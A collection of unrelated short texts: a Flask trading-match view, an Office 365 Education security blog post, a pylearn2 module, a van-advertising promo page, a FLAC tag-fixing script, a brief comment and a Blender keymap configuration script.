SUM(want_count) as other_user_wants_count,
(spare_count + want_count) as total_count
FROM (
SELECT u.account_id, COUNT(*) as spare_count, 0 as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({wanted_pack_ids}) AND up.quantity > 1
GROUP BY u.account_id
UNION
SELECT u.account_id, 0 as spare_count, COUNT(*) as want_count
FROM users u
INNER JOIN user_pack up
ON up.user_id = u.account_id AND up.pack_id IN ({spare_pack_ids}) AND up.quantity = 0
GROUP BY u.account_id
) counts_table
GROUP BY counts_table.account_id
ORDER BY total_count desc
""".format(
wanted_pack_ids=','.join(wanted_pack_ids),
spare_pack_ids=','.join(spare_pack_ids)
)
)
# Attach user objects (probably a lot better way to do this)
matches = []
for match in matches_query:
matches.append({
'user': User.query.filter(User.account_id == match[0]).first(),
'other_user_has_spare_count': match[1],
'other_user_wants_count': match[2]
})
return render_template('emoticharms/matches.html',
wanted_packs=wanted_packs,
spare_packs=spare_packs,
matches=matches)
@emoticharms.route('/trade/<int:trade_user_id>/')
@login_required
@valid_ti5_ticket
def trade(trade_user_id):
if trade_user_id == current_user.account_id:
abort(404)
trade_user = User.query.get_or_404(trade_user_id)
w1 = UserPack.query.filter(UserPack.user_id == current_user.account_id, UserPack.quantity == 0)
w2 = UserPack.query.filter(UserPack.user_id == trade_user.account_id, UserPack.quantity > 1)
#h1
#h2
user1 = w1.intersect(w2).all()
print user1
#user2 =
trade = {
"target_user": trade_user,
"giving": [],
"receiving": [],
}
return render_template('emoticharms/trade.html', trade=trade)
|
You may or may not have noticed that on the 1st September Microsoft announced new security features for Office 365 Education users however these weren’t new as they have been in the platform for a few years.
Education licenses have been aligned more to the enterprises licenses with E1 Student/Faculty matching E1 Enterprise and as new features have been added to E1 they are assigned to both tenant types. The new security features announced in this post are based around some of the features that are part of E3 Enterprise.
With any of my customers I haven’t seen any use of E3 as almost all have been happy to use the free licenses and pleased that they can get Office 365 Pro Plus as part of their Microsoft licensing but Microsoft have mixed up the features and given more to education customers for free which were in E3.
These are based more around security and discovery of files better known as E-Discovery, Rights Management Services and Data Loss Prevention have also been added but what are these.
I always describe E-Discovery as a search service if you need to find data across your whole tenant for a disciplinary hearing and you need to find everything that mentions certain words. An example I use is if a gang has started in a school and they have a name and you need to find all the emails, files and data which uses the gang name. Having searched the name, the E-Discovery tool will give you a ZIP file to download all that content.
RMS is a great way of keeping data secure by only allowing users to see the data they should. Now you might be thinking ‘well SharePoint permissions does that for me’ but this takes it to the next level. With RMS/DLP you can prevent sensitive data from being printed, secure documents with encryption if it starts to hold student data and also prevent files from being print screened and then copied into other files. Rights ensures only the right people can view the content and alongside DLP prevents them from doing certain things with it.
|
"""Module containing the Train class and support functionality."""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2015, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
from collections import namedtuple
# Lightweight container for initial YAML evaluation.
#
# This is intended as a robust, forward-compatible intermediate representation
# for either internal consumption or external consumption by another tool e.g.
# hyperopt.
#
# We've included a slot for positionals just in case, though they are
# unsupported by the instantiation mechanism as yet.
BaseProxy = namedtuple('BaseProxy', ['callable', 'positionals',
'keywords', 'yaml_src'])
class Proxy(BaseProxy):
"""
An intermediate representation between initial YAML parse and object
instantiation.
Parameters
----------
callable : callable
The function/class to call to instantiate this node.
positionals : iterable
Placeholder for future support for positional arguments (`*args`).
keywords : dict-like
A mapping from keywords to arguments (`**kwargs`), which may be
`Proxy`s or `Proxy`s nested inside `dict` or `list` instances.
Keys must be strings that are valid Python variable names.
yaml_src : str
The YAML source that created this node, if available.
Notes
-----
This is intended as a robust, forward-compatible intermediate
representation for either internal consumption or external consumption
by another tool e.g. hyperopt.
This particular class mainly exists to override `BaseProxy`'s `__hash__`
(to avoid hashing unhashable namedtuple elements).
"""
__slots__ = []
def __hash__(self):
"""
Return a hash based on the object ID (to avoid hashing unhashable
namedtuple elements).
"""
return hash(id(self))
|
Mobile billboard advertising in Cilycwm SA20 0 is a great way to promote products and services because they can target a wide audience. When searching for advertising production providers it is advisable to look at prices as well as value of services. Our agency can offer media design and media purchasing services by using a number of types of adverts to choose from. Our experts will look through your budget and brand and look for a strategy to promote your products to get you the best beneficial ROI. It’s necessary to look for a company with a good background that can supply the appropriate solutions for your business. As a skilled advertising on vans company, we'll assist you to generate a completely unique and efficient marketing plan.
Our company is a completely independent media agency closest to you in Cilycwm SA20 0 helping arrange and prepare AdVans adverts for organisations and services in numerous markets. A number of the ads that we generate and buy include social media adverts, papers, posters, television advertisements, radio ads, online marketing and much more. As local industry leaders, we are able to develop new promotional suggestions which are unique to the client's brand, create advertisements and schedule campaigns. As a current market leader within the offline and internet marketing sector we think that van marketing campaigns do not run but they evolve. We perform research on a daily basis to make certain that you receive the ideal solutions from our staff. For the best effects and ROI, we try to get an immediate reaction that concentrates on the main audience straight away. Make sure you consult with one of our advertising on vans experts by filling out the enquiry form. We will provide further information and advice on the right approaches and process to carry out promotions for your own company. Because we are an impartial offline advertising professional we can deliver fantastic return on investment from the adverts.
Get a quote for mobile billboard advertising in Cilycwm SA20 0 today and we'll get your marketing campaign underway. Our professionals will be happy to help with any questions about van advertising which you might have. To get in contact with us, just enquire using our enquiry form and we will get back to you as quickly as we can.
|
#!/usr/bin/env python
# Copyright 2009 by Jeff Ebert
# License: GNU GPL v2
import sys
import mutagen.flac
import os.path as path
# Tip from:
# http://stackoverflow.com/questions/492483/setting-the-correct-encoding-when-piping-stdout-in-python
import codecs
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
def fix_mb_tags(flac_file):
for tag in flac_file:
if tag.startswith('musicbrainz_'):
# The value of each tag is a list, so I must iterate even though
# there is only 1 for these cases.
values = flac_file[tag]
for i in range(len(values)):
# Extract UUID value from URL.
base = path.basename(values[i])
base = path.splitext(base)[0]
values[i] = base
flac_file[tag] = values
def main(argv):
if len(argv) == 1:
print "Usage: {0} <flac file>+\n".format(path.basename(argv[0]))
sys.exit(0)
for fn in argv[1:]:
flac_file = mutagen.flac.Open(fn)
fix_mb_tags(flac_file)
print flac_file.pprint()
flac_file.save()
if __name__ == '__main__':
main(sys.argv)
|
Serious style inspo! Love it!!
|
import bpy
import os
def kmi_props_setattr(kmi_props, attr, value):
try:
setattr(kmi_props, attr, value)
except AttributeError:
print("Warning: property '%s' not found in keymap item '%s'" %
(attr, kmi_props.__class__.__name__))
except Exception as e:
print("Warning: %r" % e)
wm = bpy.context.window_manager
kc = wm.keyconfigs.new(os.path.splitext(os.path.basename(__file__))[0])
# Map Object Mode
km = kc.keymaps.new('Object Mode', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.use_proportional_edit_objects')
kmi = km.keymap_items.new('view3d.game_start', 'P', 'PRESS')
kmi = km.keymap_items.new('object.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('object.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('object.select_linked', 'L', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_grouped', 'G', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.select_mirror', 'M', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'LEFT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'PARENT')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS')
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('object.select_hierarchy', 'RIGHT_BRACKET', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'direction', 'CHILD')
kmi_props_setattr(kmi.properties, 'extend', True)
kmi = km.keymap_items.new('object.parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.parent_no_inverse_set', 'P', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.parent_clear', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.track_set', 'T', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.track_clear', 'T', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.constraint_add_with_targets', 'C', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.constraints_clear', 'C', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.location_clear', 'G', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.rotation_clear', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.scale_clear', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.origin_clear', 'O', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_clear', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('object.hide_view_set', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('object.hide_render_clear', 'H', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.hide_render_set', 'H', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.move_to_layer', 'M', 'PRESS')
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'X', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_global', False)
kmi = km.keymap_items.new('object.delete', 'DEL', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_global', True)
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_add')
kmi = km.keymap_items.new('object.duplicates_make_real', 'A', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_apply')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_single_user')
kmi = km.keymap_items.new('wm.call_menu', 'L', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_make_links')
kmi = km.keymap_items.new('object.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('object.duplicate_move_linked', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.join', 'J', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('object.convert', 'C', 'PRESS', alt=True)
kmi = km.keymap_items.new('object.proxy_make', 'P', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('object.make_local', 'L', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_insert_menu', 'I', 'PRESS')
kmi = km.keymap_items.new('anim.keyframe_delete_v3d', 'I', 'PRESS', alt=True)
kmi = km.keymap_items.new('anim.keying_set_active_set', 'I', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.create', 'G', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('group.objects_remove', 'G', 'PRESS', ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_remove_all', 'G', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('group.objects_add_active', 'G', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('group.objects_remove_active', 'G', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_object_specials')
kmi.active = False
kmi = km.keymap_items.new('object.data_transfer', 'T', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
# Map Mesh
km = kc.keymaps.new('Mesh', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('mesh.loopcut_slide', 'R', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.inset', 'I', 'PRESS')
kmi = km.keymap_items.new('mesh.poke', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', False)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', True)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', shift=True, ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.shortest_path_pick', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi.active = False
kmi = km.keymap_items.new('mesh.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('mesh.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('mesh.select_more', 'NUMPAD_PLUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_less', 'NUMPAD_MINUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_non_manifold', 'M', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('mesh.select_linked', 'L', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', ctrl=True)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi = km.keymap_items.new('mesh.faces_select_linked_flat', 'F', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_similar')
kmi = km.keymap_items.new('wm.call_menu', 'TAB', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_mode')
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('mesh.reveal', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', False)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', True)
kmi = km.keymap_items.new('view3d.edit_mesh_extrude_move_normal', 'E', 'CLICK')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_extrude')
kmi = km.keymap_items.new('transform.edge_crease', 'E', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.spin', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.fill', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.beautify_fill', 'F', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'BEAUTY')
kmi_props_setattr(kmi.properties, 'ngon_method', 'BEAUTY')
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'FIXED')
kmi_props_setattr(kmi.properties, 'ngon_method', 'CLIP')
kmi = km.keymap_items.new('mesh.tris_convert_to_quads', 'J', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_move', 'V', 'PRESS')
kmi = km.keymap_items.new('mesh.rip_move_fill', 'V', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_edge_move', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.merge', 'M', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.shrink_fatten', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.edge_face_add', 'F', 'PRESS')
kmi = km.keymap_items.new('mesh.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_mesh_add')
kmi = km.keymap_items.new('mesh.separate', 'P', 'PRESS')
kmi = km.keymap_items.new('mesh.split', 'Y', 'PRESS')
kmi = km.keymap_items.new('mesh.vert_connect_path', 'J', 'PRESS')
kmi = km.keymap_items.new('transform.vert_slide', 'V', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', False)
kmi = km.keymap_items.new('wm.call_menu', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('wm.call_menu', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('mesh.dissolve_mode', 'X', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.dissolve_mode', 'DEL', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.knife_tool', 'C', 'CLICK')
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', True)
kmi_props_setattr(kmi.properties, 'only_selected', False)
kmi = km.keymap_items.new('mesh.knife_tool', 'K', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', False)
kmi_props_setattr(kmi.properties, 'only_selected', True)
kmi = km.keymap_items.new('object.vertex_parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_specials')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi = km.keymap_items.new('wm.call_menu', 'V', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi = km.keymap_items.new('wm.call_menu', 'H', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_hook')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_uv_map')
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_vertex_group')
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'ENABLED')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'CONNECTED')
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', shift=True)
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'CLICK')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'use_expand', False)
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('wm.call_menu', 'ONE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'TWO', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'THREE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi.active = False
# Map 3D View
km = kc.keymaps.new('3D View', space_type='VIEW_3D', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'ACTIONMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_rRMB')
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.rotate', 'MIDDLEMOUSE', 'PRESS')
kmi = km.keymap_items.new('view3d.move', 'MIDDLEMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'MIDDLEMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.dolly', 'MIDDLEMOUSE', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'SPACE', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi = km.keymap_items.new('view3d.view_selected', 'NUMPAD_PERIOD', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_lock_to_active', 'NUMPAD_PERIOD', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_lock_clear', 'NUMPAD_PERIOD', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.navigate', 'F', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.smoothview', 'TIMER1', 'ANY', any=True)
kmi = km.keymap_items.new('view3d.rotate', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new('view3d.rotate', 'MOUSEROTATE', 'ANY')
kmi = km.keymap_items.new('view3d.move', 'TRACKPADPAN', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADZOOM', 'ANY')
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADPAN', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_PLUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_MINUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'EQUAL', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'MINUS', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELINMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELOUTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_PLUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_MINUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'EQUAL', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'MINUS', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom_camera_1_to_1', 'NUMPAD_ENTER', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_center_camera', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_lock', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_cursor', 'HOME', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_center_pick', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS')
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'C', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'center', True)
